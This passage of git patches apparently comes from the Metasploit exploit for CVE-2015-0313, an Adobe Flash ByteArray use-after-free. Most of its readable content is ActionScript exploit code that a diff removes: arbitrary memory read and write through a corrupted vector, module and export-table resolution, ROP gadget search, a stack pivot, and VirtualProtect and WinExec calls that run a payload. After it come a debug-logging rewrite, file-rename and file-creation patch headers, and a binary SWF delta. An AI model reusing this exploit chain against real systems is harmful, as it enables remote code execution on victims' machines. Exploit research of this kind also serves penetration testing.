     private function onMessage(e:Event):void
     {
-        casi32(0, 1022, 0xFFFFFFFF)
-        if (ba.length != 0xffffffff) mc.receive()
+		Logger.log("[*] onMessage")
+        var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
+		Logger.log("[*] onMessage - mod: " + mod.toString())
+        if (mod == 1022) mc.receive()
         else {
-            ba.endian = "littleEndian"
-            var data:Array = (mc.receive() as String).split("/")
-            byte_write(parseInt(data[0]))
-            var buffer:uint = parseInt(data[1]) as uint
-            var main:uint = parseInt(data[2]) as uint
-            var vtable:uint = parseInt(data[3]) as uint
-            var flash:uint = base(vtable)
-            var ieshims:uint = module("winmm.dll", flash)
-            var kernel32:uint = module("kernel32.dll", ieshims)
-
-            var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-            var winexec:uint = procedure("WinExec", kernel32)
-            var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-
-            //CoE
-            byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-            byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-            byte_write(0, "\x89\x03", false) // mov [ebx], eax
-            byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-            byte_write(buffer+0x200, payload);
-            byte_write(buffer + 0x20070, xchgeaxespret)
-            byte_write(buffer + 0x20000, xchgeaxesiret)
-            byte_write(0, virtualprotect)
-
-            // VirtualProtect
-            byte_write(0, winexec)
-            byte_write(0, buffer + 0x30000)
-            byte_write(0, 0x1000)
-            byte_write(0, 0x40)
-            byte_write(0, buffer + 0x100)
-
-            // WinExec
-            byte_write(0, buffer + 0x30000)
-            byte_write(0, buffer + 0x200)
-            byte_write(0)
-
-            byte_write(main, buffer + 0x20000)
-            toString()
+			Logger.log("[*] onMessage - Searching corrupted vector...")
+	        for (var i:uint = 0; i < ov.length; i++) {
+	            if (ov[i].length == 0xffffffff) {
+					uv = ov[i]
+				} else {
+					ov[i] = null
+				}
+	        }
+			if (uv == null) {
+				Logger.log("not found")
+				return
+			}
+			Logger.log('whooray: ' + uv.length.toString(16))
         }
     }
-
-    private function vector_write(addr:uint, value:uint = 0):void
-    {
-        addr > ov[0][0] ? ov[0][(addr - uv[0]) / 4 - 2] = value : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1] = value
-    }
-
-    private function vector_read(addr:uint):uint
-    {
-        return addr > ov[0][0] ? ov[0][(addr - ov[0][0]) / 4 - 2] : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1]
-    }
-
-    private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-    {
-        if (addr) ba.position = addr
-        if (value is String) {
-            for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-            if (zero) ba.writeByte(0)
-        } else ba.writeUnsignedInt(value)
-    }
-
-    private function byte_read(addr:uint, type:String = "dword"):uint
-    {
-        ba.position = addr
-        switch(type) {
-            case "dword":
-                return ba.readUnsignedInt()
-            case "word":
-                return ba.readUnsignedShort()
-            case "byte":
-                return ba.readUnsignedByte()
-        }
-        return 0
-    }
-
-    private function base(addr:uint):uint
-    {
-        addr &= 0xffff0000
-        while (true) {
-            if (byte_read(addr) == 0x00905a4d) return addr
-            addr -= 0x10000
-        }
-        return 0
-    }
-
-    private function module(name:String, addr:uint):uint
-    {
-        var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
-        while (true) {
-            var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-            if (!entry) throw new Error("FAIL!");
-            ba.position = addr + entry
-            if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
-        }
-        return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
-    }
-
-    private function procedure(name:String, addr:uint):uint
-    {
-        var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-        var numberOfNames:uint = byte_read(eat + 0x18)
-        var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-        var addressOfNames:uint = addr + byte_read(eat + 0x20)
-        var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-        for (var i:uint = 0; ; i++) {
-            var entry:uint = byte_read(addressOfNames + i * 4)
-            ba.position = addr + entry
-            if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-        }
-        return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-    }
-
-    private function gadget(gadget:String, hint:uint, addr:uint):uint
-    {
-        var find:uint = 0
-        var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-        var value:uint = parseInt(gadget, 16)
-        for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-        return addr + i
-    }
 }
 }

From 64b486eeacee860aa2cc532f7e76e05c4e80ce0d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 09:12:52 -0500
Subject: [PATCH 0380/1013] Change filename

---
 external/source/exploits/CVE-2015-0313/{Main.as => Exploit.as} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename external/source/exploits/CVE-2015-0313/{Main.as => Exploit.as} (100%)

diff --git a/external/source/exploits/CVE-2015-0313/Main.as b/external/source/exploits/CVE-2015-0313/Exploit.as
similarity index 100%
rename from external/source/exploits/CVE-2015-0313/Main.as
rename to external/source/exploits/CVE-2015-0313/Exploit.as

From a6fe38385215c5a101c9e172c8331c1743ca2527 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 09:32:52 -0500
Subject: [PATCH 0381/1013] Use AS Exploiter

---
 data/exploits/CVE-2015-0313/msf.swf           | Bin 18009 -> 20971 bytes
 external/source/exploits/CVE-2015-0313/Elf.as | 235 +++++++++++
 .../source/exploits/CVE-2015-0313/Exploit.as  |  30 +-
 .../CVE-2015-0313/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2015-0313/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2015-0313/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2015-0313/Logger.as   |  32 ++
 external/source/exploits/CVE-2015-0313/PE.as  |  72 ++++
 .../adobe_flash_worker_byte_array_uaf.rb      |  21 +-
 9 files changed, 925 insertions(+), 23 deletions(-)
 create mode 100644 external/source/exploits/CVE-2015-0313/Elf.as
 create mode 100644 external/source/exploits/CVE-2015-0313/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2015-0313/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2015-0313/Exploiter.as
 create mode 100644 external/source/exploits/CVE-2015-0313/Logger.as
 create mode 100644 external/source/exploits/CVE-2015-0313/PE.as

diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
index f4d5e8f32de2cc716af392728756f7b472967ff0..065aebeb0ce44ab1cd5eb783022d813fd2ef5f59 100755
GIT binary patch
delta 20853
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
